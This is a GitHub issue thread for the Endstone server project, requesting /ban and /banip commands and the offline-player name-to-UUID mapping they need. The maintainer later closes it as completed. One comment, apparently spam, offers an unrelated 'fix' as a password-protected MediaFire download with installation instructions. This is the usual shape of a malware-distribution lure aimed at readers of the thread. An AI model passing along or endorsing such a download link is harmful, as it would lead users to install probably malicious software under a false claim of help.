### ISSUE TITLE
[feature] Add `/ban` and `/banip` as built-in commands

### ISSUE THREAD

**Issue by wu-vincent** [EndstoneMC/endstone#43]
**Is your feature request related to a problem? Please describe.**
Currently, the `/ban` and `/banip` commands are missing from the default command set in BDS.

**Describe the solution you'd like**
1. Implement the `/ban` and `/banip` commands to ban online players.
2. Add the ability to ban offline players who have previously joined the server.

**Additional context**
BDS stores player data using their UUID as the key in leveldb with the prefix `player_`. To be able to ban offline players by name, we need to maintain a mapping between player names and their UUIDs. This mapping should be stored in a separate file, which should be updated each time a player joins the server. In Bukkit, a similar file called `usercache.json` exists so we could potentially use a similar format.

Once we have access to player data from leveldb using the username, we will also need to store additional data (e.g., last seen IP address). This could be stored in an additional compound tag, possibly named `endstone`.

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by wu-vincent** [comment]
Completed since https://github.com/EndstoneMC/endstone/commit/a6652196d55cdd4a5c056d59191612d1f3d18b81.
